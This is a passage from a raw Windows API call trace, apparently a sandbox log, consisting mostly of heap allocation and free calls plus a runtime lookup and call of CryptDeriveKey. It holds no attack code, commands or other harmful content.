(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0087.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0087.461] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0087.461] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0087.461] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0087.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0087.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.463] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0087.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0087.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0087.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0087.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0087.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0087.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0087.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0087.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0087.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0087.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0087.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0087.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0087.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0087.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0087.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0087.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf) returned 0x2aa9e68 [0087.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9e68, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0087.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.494] GetProcAddress (hModule=0x76390000, lpProcName="CryptDeriveKey") returned 0x763c2c90 [0087.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f80 [0087.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0087.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0087.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0087.495] CryptDeriveKey (in: hProv=0x9961a8, Algid=0x6601, hBaseData=0x9a3fc0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4280) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0087.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69790 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: 